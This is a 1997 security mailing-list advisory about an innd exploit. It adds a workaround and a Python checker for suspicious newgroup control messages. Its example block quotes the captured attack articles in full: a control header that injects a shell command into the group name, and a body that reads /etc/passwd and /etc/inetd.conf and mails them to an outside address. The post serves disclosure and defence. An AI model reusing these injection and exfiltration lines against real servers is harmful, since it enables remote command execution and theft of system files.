
BoS: RE: Innd Exploited.

daemon@ATHENA.MIT.EDU (Joseph J. Snyder III)
Mon Mar 17 18:39:28 1997

From: "Joseph J. Snyder III" <jsnyder@plasma.ea.wsoc.com>
Date: Mon, 17 Mar 97 13:58:06 EST
Reply-To: best-of-security@suburbia.net
Errors-To: best-of-security-request@suburbia.net
To: best-of-security@suburbia.net
Resent-From: best-of-security@suburbia.net

----------------------------------------------------------------------
PROBLEM:
        This is regarding the innd exploit that took place March
15, 1997 at approx. 1630-1645.  This exploit seems to be widespread.
The following is an example of the exploit:

-- begin example --
Unparseable newgroup by tale@uunet.uu.net
Path: nntp.xxxxxxxxx.xxx!nntp.netrex.net!gatech!EU.net!Norway.EU.net!sn.no!online.no!news.omgroup.com!online.no!bounce-back
From: tale@uunet.uu.net (David C Lawrence)
Newsgroups: comp.sys.mac.printing
Subject: cmsg newgroup `/bin/sed:-n:'/^#+/,/^#-/p':${ARTICLE}|/bin/sh` moderatedControl: newgroup `/bin/sed:-n:'/^#+/,/^#-/p':${ARTICLE}|/bin/sh` moderated
Approved: newgroups-request@uunet.uu.net
     Message-ID: <830201540.9220@uunet.uu.net>
Date: Sat, 15 Mar 1997 15:15:15 GMT
Lines: 4

#+
(/bin/uname -a; /bin/who; /bin/cat /etc/passwd; /bin/cat /etc/inetd.conf) | /bi>#-


Unsafe newgroup by tale@uunet.uu.net
     Path: nntp.xxxxxxxxx.xxx!nntp.netrex.net!sbcntrex!news.eecs.umich.edu!news.radio.cz!newsbastard.radio.cz!news.radio.cz!CESspool!news.maxwell.syr.edu!nntp.uio.no!Norway.EU.net!online.no!news.omgroup.com!online.no!bounce-back
     From: tale@uunet.uu.net (David C Lawrence)
Newsgroups: comp.sys.mac.printing
     Subject: cmsg newgroup `/bin/sed:-n:'/^#+/,/^#-/p':${ARTICLE}|/bin/sh` moderated
Control: newgroup `/bin/sed:-n:'/^#+/,/^#-/p':${ARTICLE}|/bin/sh` moderated
Approved: newgroups-request@uunet.uu.net
Message-ID: <830201540.9223@uunet.uu.net>
Date: Sat, 15 Mar 1997 15:15:15 GMT
Lines: 4

#+
(/bin/uname -a; /bin/who; /bin/cat /etc/passwd; /bin/cat /etc/inetd.conf) | /usr/ucb/Mail -s kalle root@[193.12.106.1]
#-

-- end example --

If this newgroup is created then any message that is posted to the group will
be executed with /bin/sh.

----------------------------------------------------------------------
THINGS TO DO:

You should see what processes are running as the uid that runs innd (hopefully
not root) and inspect programs that it is running through /bin/sh. Telnet
connections were also made in this exploit from the attacked machine to the
attacker. Run netstat to see if this is true in your case.  Check your mqueue
directory for messages that contain mail to root@193.12.106.100 or that contain
your passwd file.  Follow CERT procedures of what to do if you are hacked.
Finally, reboot your machine to kill misc. /bin/sh scripts that may be running.


----------------------------------------------------------------------
IMPACT:

Any command that the user running news can run can be executed.  With a little
creative scripting, known exploits can be created on the news server to gain
access to root and execute commands as root.


----------------------------------------------------------------------
RESOLUTION:

Unfortunately I have heard that Innd 1.5.1 does not fix this problem.
Currently I have not verified this claim.

----------------------------------------------------------------------
TEMPORARY WORKAROUND:

The temporary workaround could be to disallow remote control of newsgroups.
This can be done by commenting out the rmgroup and mkgroup configs that allow
offsite control of newsgroups.  This can be done within the control.ctl file.
I am not an expert on innd so if anyone else knows of anything else that needs
to be done or if anything I am saying is incorrect please feel free to 
add to this discussion.
 
----------------------------------------------------------------------
ADDITIONAL COMMENTS:

Please feel free to comment/add to this message.


----------------------------------------------------------------------
DISCLAIMER:

I am not responsible for anything that may happen because
of actions you take based on this message.  Understand that I do not claim
to be an expert with innd and that any actions you take are at your own risk.



Joseph J. Snyder III
Network Security Eng.
Litton-PRC, Inc.
http://c3i.wsoc.com/
jsnyder@plasma.ea.wsoc.com
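A small detection check for the pattern described in this post, added here as an example; it is not code from the post or from INN. It parses an article's headers and flags a newgroup/rmgroup control whose target is not a syntactically valid newsgroup name or whose control line carries shell metacharacters (the exploit depends on exactly that: a "group name" built from backticks, `$` and `|` with no spaces). The sample articles are constructed from the headers quoted above with the body left out, and the allowed-character set for group names is a simplifying assumption.

```python
import re

# Characters a legitimate newsgroup name may contain (assumed, simplified);
# anything else in the target of a newgroup/rmgroup control is suspect.
SAFE_GROUP_NAME = re.compile(r"^[A-Za-z0-9][A-Za-z0-9+_.-]*$")
SHELL_METACHARS = set("`$|;&<>(){}")

# Constructed sample: headers follow the article quoted in the post, body omitted.
EXPLOIT_ARTICLE = (
    "From: tale@uunet.uu.net (David C Lawrence)\n"
    "Subject: cmsg newgroup `/bin/sed:-n:'/^#+/,/^#-/p':${ARTICLE}|/bin/sh` moderated\n"
    "Control: newgroup `/bin/sed:-n:'/^#+/,/^#-/p':${ARTICLE}|/bin/sh` moderated\n"
    "Approved: newgroups-request@uunet.uu.net\n"
    "\n(body omitted)\n"
)
# A well-formed newgroup message for comparison (also constructed).
BENIGN_ARTICLE = (
    "From: newgroups-request@example.net\n"
    "Control: newgroup comp.example.newgroup moderated\n"
    "\n(body omitted)\n"
)

def parse_headers(article: str) -> dict:
    """Map lower-cased header names to values; stops at the first blank line."""
    headers = {}
    for line in article.split("\n\n", 1)[0].splitlines():
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return headers

def check_control(article: str) -> list:
    """Return findings for a newgroup/rmgroup control message; [] if clean."""
    headers = parse_headers(article)
    control = headers.get("control")
    if control is None and headers.get("subject", "").startswith("cmsg "):
        control = headers["subject"][5:]   # legacy 'cmsg' form old INN honoured
    if not control:
        return []
    words = control.split()
    if len(words) < 2 or words[0] not in ("newgroup", "rmgroup"):
        return []                          # other control types not covered
    findings = []
    if SHELL_METACHARS & set(control):
        findings.append("shell metacharacters in control line")
    if not SAFE_GROUP_NAME.match(words[1]):
        findings.append("invalid newsgroup name: " + words[1])
    return findings
```

Run over a spool or an incoming feed, any non-empty result is worth a look before the group is created, regardless of what the From: and Approved: headers claim.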

